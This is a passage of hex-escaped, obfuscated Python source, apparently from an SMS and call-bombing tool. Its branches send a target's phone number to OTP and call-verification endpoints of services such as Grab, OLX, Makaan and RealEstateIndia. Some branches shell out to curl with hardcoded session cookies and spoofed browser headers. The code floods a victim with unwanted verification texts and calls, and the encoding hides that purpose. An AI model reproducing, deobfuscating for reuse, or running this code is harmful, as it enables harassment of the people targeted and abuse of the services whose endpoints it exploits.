0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x63\x6c\x6f\x75\x64\x2e\x61\x6c\x74\x62\x61\x6c\x61\x6a\x69\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2f\x6d\x6f\x62\x69\x6c\x65\x2f\x76\x65\x72\x69\x66\x79\x3f\x64\x6f\x6d\x61\x69\x6e\x3d\x49\x4e\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x20\x3d\x3d\x20\x27\x32\x34\x66\x34\x36\x37\x62\x32\x34\x30\x38\x37\x66\x66\x34\x38\x63\x39\x36\x33\x32\x31\x37\x38\x36\x64\x38\x39\x63\x36\x39\x66\x27\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x35\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x6f\x6f\x6b\x69\x65\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6f\x6b\x69\x65\x3a\x66\x72\x6f\x6e\x74\x65\x6e\x64\x27\x3a\x20\x27\x61\x32\x37\x6d\x6e\x33\x68\x33\x69\x72\x74\x31\x72\x6c\x74\x36\x69\x35\x35\x73\x39\x33\x70\x39\x72\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x72\x6f\x6e\x74\x65\x6e\x64\x5f\x63\x69\x64\x27\x3a\x20\x27\x38\x7a\x71\x42\x42\x7a\x77\x51\x54\x4d\x49\x74\x39\x55\x4b\x67\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x5f\x42\x45\x41\x4d\x45\x52\x5f\x55\x53\x45\x52\x5f\x49\x44\x5f\x67\x41\x44\x72\x79\x63\x42\x6e\x31\x32\x38\x37\x30\x27\x3a\x20\x27\x63\x39\x66\x65\x34\x66\x37\x64\x2d\x62\x34\x32\x31\x2d\x34\x62\x61\x64\x2d\x39\x63\x66\x32\x2d\x30\x61\x34\x64\x62\x37\x31\x36\x64\x66\x66\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x47\x5f\x45\x4e\x41\x42\x4c\x45\x44\x5f\x49\x44\x50\x53\x27\x3a\x20\x27\x67\x6f\x6f\x67\x6c\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x4f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x31\x30\x31\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x2c\x61\x72\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x65\x6d\x61\x69\x6c\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x72\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x61\x73\x74\x6e\x61\x6d\x65\x27\x3a\x20\x27\x53\x70\x65\x65\x64\x58\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x61\x61\x6c\x61\x2e\x63\x6f\x6d\x2f\x61\x63\x63\x75\x73\x74\x6f\x6d\x65\x72\x2f\x61\x6a\x61\x78\x2f\x67\x65\x74\x4f\x54\x50\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x6a\x73\x6f\x6e\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x27\x63\x6f\x64\x65\x3a\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x36\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x65\x74\x68\x6f\x64\x27\x3a\x20\x27\x53\x4d\x53\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x75\x6e\x74\x72\x79\x43\x6f\x64\x65\x27\x3a\x20\x27\x69\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x70\x68\x6f\x6e\x65\x4e\x75\x6d\x62\x65\x72\x27\x3a\x20\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x74\x65\x6d\x70\x6c\x61\x74\x65\x49\x44\x27\x3a\x20\x27\x70\x61\x78\x5f\x61\x6e\x64\x72\x6f\x69\x64\x5f\x70\x72\x6f\x64\x75\x63\x74\x69\x6f\x6e\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x67\x72\x61\x62\x2e\x63\x6f\x6d\x2f\x67\x72\x61\x62\x69\x64\x2f\x76\x31\x2f\x70\x68\x6f\x6e\x65\x2f\x6f\x74\x70\x27\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x61\x6b\x61\x61\x6e\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x73\x2f\x6e\x63\x2f\x73\x65\x6e\x64\x4f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x2f\x31\x36\x32\x35\x37\x30\x36\x35\x2f\x27\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x6e\x20\x2b\x20\x27\x3f\x63\x61\x6c\x6c\x54\x79\x70\x65\x3d\x6f\x74\x70\x4f\x6e\x43\x61\x6c\x6c\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6e\x65\x77\x20\x6f\x74\x70\x20\x68\x61\x73\x20\x62\x65\x65\x6e\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x64\x20\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x27\x2d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x72\x6b\x65\x74\x69\x6e\x67\x2e\x74\x6c\x6c\x6d\x73\x2e\x63\x6f\x6d\x2f\x65\x6c\x65\x61\x72\x6e\x2f\x61\x70\x69\x2f\x76\x34\x2f\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x69\x6f\x6e\x73\x2f\x70\x68\x6f\x6e\x65\x5f\x63\x61\x6c\x6c\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x6f\x74\x70\x20\x72\x65\x71\x75\x65\x73\x74\x73\x20\x65\x78\x63\x65\x65\x64\x65\x64\x22\x29\x20\x3d\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x35\x38\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x78\x2d\x72\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x77\x69\x74\x68\x3a\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x22\x20\x2d\x48\x20\x22\x73\x61\x76\x65\x2d\x64\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x74\x68\x61\x6e\x6b\x73\x2e\x70\x68\x70\x3f\x6e\x65\x77\x72\x65\x67\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x74\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x65\x6d\x61\x69\x6c\x5f\x76\x65\x72\x69\x66\x79\x5f\x73\x74\x61\x74\x75\x73\x3d\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x5f\x62\x6c\x6f\x63\x6b\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x63\x6f\x75\x6e\x74\x72\x79\x3d\x49\x4e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x70\x61\x69\x64\x5f\x73\x74\x61\x74\x75\x73\x3d\x30\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x74\x79\x70\x65\x3d\x31\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x65\x6d\x61\x69\x6c\x3d\x46\x61\x6b\x65\x6d\x61\x6d\x25\x34\x30\x72\x69\x6c\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x6e\x61\x6d\x65\x3d\x46\x61\x6b\x65\x6d\x61\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x72\x65\x69\x5f\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x63\x6f\x6f\x6b\x69\x5f\x73\x65\x73\x73\x5f\x69\x64\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6e\x61\x6d\x65\x3d\x39\x71\x38\x62\x73\x75\x63\x6a\x36\x6d\x67\x76\x75\x32\x64\x63\x30\x33\x62\x66\x73\x76\x6c\x66\x30\x37\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x69\x64\x3d\x47\x41\x31\x2e\x32\x2e\x36\x32\x36\x35\x32\x35\x39\x30\x39\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x5f\x67\x61\x3d\x47\x41\x31\x2e\x32\x2e\x31\x30\x33\x33\x30\x37\x39\x33\x33\x31\x2e\x31\x35\x36\x30\x38\x33\x36\x33\x36\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x76\x69\x73\x69\x74\x65\x64\x54\x6f\x6b\x65\x6e\x3d\x31\x37\x36\x39\x36\x31\x35\x36\x30\x38\x33\x36\x33\x36\x37\x22\x20\x2d\x64\x20\x5c\x27\x61\x63\x74\x69\x6f\x6e\x5f\x69\x64\x3d\x63\x61\x6c\x6c\x5f\x74\x6f\x5f\x6f\x74\x70\x26\x6d\x6f\x62\x5f\x6e\x75\x6d\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x6d\x65\x6d\x62\x65\x72\x5f\x69\x64\x3d\x31\x35\x34\x37\x30\x34\x35\x5c\x27\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x61\x6c\x65\x73\x74\x61\x74\x65\x69\x6e\x64\x69\x61\x2e\x63\x6f\x6d\x2f\x6d\x6f\x62\x69\x6c\x65\x2d\x73\x63\x72\x69\x70\x74\x2f\x69\x6e\x64\x69\x61\x6e\x5f\x6d\x6f\x62\x69\x6c\x65\x5f\x76\x65\x72\x69\x66\x69\x63\x61\x74\x69\x6f\x6e\x5f\x66\x6f\x72\x6d\x2e\x70\x68\x70\x3f\x73\x69\x64\x3d\x30\x2e\x35\x39\x38\x33\x32\x32\x31\x33\x39\x35\x38\x30\x35\x33\x35\x34\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x66\x69\x6e\x64\x28\x22\x79\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x33\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6f\x73\x2e\x73\x79\x73\x74\x65\x6d\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x3a\x34\x34\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x3a\x2a\x2f\x2a\x22\x20\x2d\x48\x20\x22\x78\x2d\x6e\x65\x77\x72\x65\x6c\x69\x63\x2d\x69\x64\x3a\x56\x51\x4d\x47\x55\x31\x5a\x56\x44\x78\x41\x42\x55\x31\x6c\x62\x42\x67\x4d\x44\x55\x6c\x49\x3d\x22\x20\x2d\x48\x20\x22\x6f\x72\x69\x67\x69\x6e\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x35\x2e\x30\x2e\x32\x3b\x20\x53\x48\x2d\x30\x34\x47\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x72\x65\x66\x65\x72\x65\x72\x3a\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x61\x63\x63\x65\x70\x74\x2d\x6c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x6f\x6e\x61\x70\x3d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x2d\x31\x36\x62\x31\x62\x38\x66\x34\x38\x64\x34\x78\x37\x34\x36\x64\x34\x37\x61\x62\x2d\x31\x39\x2d\x31\x35\x35\x39\x35\x33\x37\x33\x34\x35\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x62\x6d\x5f\x73\x76\x3d\x43\x44\x42\x39\x37\x46\x35\x30\x44\x41\x36\x36\x31\x35\x41\x43\x34\x32\x30\x46\x33\x45\x36\x45\x37\x37\x42\x30\x34\x45\x34\x32\x7e\x4f\x6f\x58\x32\x66\x41\x75\x50\x37\x67\x67\x63\x4e\x61\x30\x56\x6a\x7a\x45\x39\x35\x46\x7a\x4a\x4e\x4b\x52\x64\x4a\x6c\x57\x30\x39\x48\x6a\x61\x30\x2f\x63\x79\x73\x49\x47\x46\x31\x73\x4a\x6f\x42\x4f\x37\x69\x30\x6e\x64\x47\x58\x71\x6e\x54\x57\x4c\x61\x75\x6e\x6c\x79\x78\x6b\x74\x48\x4c\x62\x45\x38\x42\x53\x73\x74\x50\x43\x52\x59\x6e\x38\x56\x64\x50\x31\x35\x6c\x76\x55\x78\x4b\x33\x5a\x59\x39\x61\x68\x58\x4f\x53\x67\x77\x41\x69\x64\x78\x77\x58\x64\x31\x6a\x43\x65\x35\x77\x6a\x49\x7a\x59\x62\x69\x58\x70\x35\x65\x4b\x4e\x57\x66\x46\x70\x6f\x77\x68\x46\x62\x70\x78\x6c\x6f\x65\x2b\x53\x72\x62\x69\x45\x30\x59\x48\x4a\x56\x50\x63\x43\x56\x35\x62\x6d\x64\x73\x48\x67\x50\x66\x51\x63\x3d\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x6b\x69\x65\x3a\x41\x4d\x50\x5f\x54\x4f\x4b\x45\x4e\x3d\x25\x32\x34\x4e\x4f\x54\x5f\x46\x4f\x55\x4e\x44\x22\x20\x2d\x48\x20\x22\x63\x6f\x6f\x